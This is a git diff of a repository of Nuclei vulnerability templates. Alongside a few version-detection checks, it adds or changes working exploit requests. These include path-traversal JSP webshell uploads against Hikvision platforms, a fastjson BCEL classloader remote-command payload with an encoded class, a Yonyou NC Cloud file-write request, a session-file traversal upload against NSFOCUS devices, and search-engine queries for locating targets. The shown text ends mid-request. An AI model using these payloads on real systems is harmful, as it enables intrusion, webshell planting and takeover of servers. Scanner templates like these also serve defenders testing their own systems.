diff --git a/date.txt b/date.txt index 42eedaf32c..18af8d7e28 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240901 +20240902 diff --git a/poc.txt b/poc.txt index 9a8a68cc29..2f04f118f1 100644 --- a/poc.txt +++ b/poc.txt @@ -40929,6 +40929,7 @@ ./poc/cve/CVE-2024-5041-683fbe7656aac22ccbf1456af0532a73.yaml ./poc/cve/CVE-2024-5041.yaml ./poc/cve/CVE-2024-5053-efd2b0e65d76d17f35c9856f865d744c.yaml +./poc/cve/CVE-2024-5053.yaml ./poc/cve/CVE-2024-5057-b5cd1f63e71feb762d09590f74da1942.yaml ./poc/cve/CVE-2024-5057.yaml ./poc/cve/CVE-2024-5058-63a03ea4af4d1f6d04449e3cd1d991f1.yaml diff --git a/poc/cve/CVE-2024-5053.yaml b/poc/cve/CVE-2024-5053.yaml new file mode 100644 index 0000000000..e931361d8d --- /dev/null +++ b/poc/cve/CVE-2024-5053.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5053 + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.18 - Missing Authorization to Authenticated (Subscriber+) Mailchimp Integration Modification + author: topscoder + severity: low + description: > + The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized Malichimp API key update due to an insufficient capability check on the verifyRequest function in all versions up to, and including, 5.1.18. This makes it possible for Form Managers with a Subscriber-level access and above to modify the Mailchimp API key used for integration. At the same time, missing Mailchimp API key validation allows the redirect of the integration requests to the attacker-controlled server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 4.2 + cve-id: CVE-2024-5053 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-5053' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.18') \ No newline at end of file diff --git a/poc/cve/cve-2001-1473.yaml b/poc/cve/cve-2001-1473.yaml index 80480efb7b..d7ad14a2d1 100644 --- a/poc/cve/cve-2001-1473.yaml +++ b/poc/cve/cve-2001-1473.yaml @@ -1,11 +1,11 @@ id: CVE-2001-1473 - info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - + tags: cve,cve2001,network,ssh,openssh description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: word words: - "SSH-1" + +# Updated by Chris on 2022/01/21 diff --git a/poc/cve/cve-2015-5354.yaml b/poc/cve/cve-2015-5354.yaml index f20d2dfa3f..20062f876d 100644 --- a/poc/cve/cve-2015-5354.yaml +++ b/poc/cve/cve-2015-5354.yaml @@ -1,31 +1,26 @@ id: CVE-2015-5354 - info: name: Novius OS 5.0.1-elche - Open Redirect author: 0x_Akoko severity: medium - description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. reference: - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://vuldb.com/?id.76181 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5354 - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-5354 cwe-id: CWE-601 - tags: packetstorm,cve,cve2015,redirect,novius - + tags: cve,cve2015,redirect,novius requests: - method: GET path: - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' - matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/07/22 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 @@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index 548327e206..ccf03eab13 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml @@ -1,20 +1,18 @@ id: CVE-2018-1271 + info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: - - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - - https://access.redhat.com/errata/RHSA-2018:1320 + reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.90 cve-id: CVE-2018-1271 cwe-id: CWE-22 - tags: cve,cve2018,spring,lfi,traversal + description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." + requests: - method: GET path: diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml @@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - ".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index 1cd783867f..a8f9cbe173 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml @@ -1,28 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + --4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; 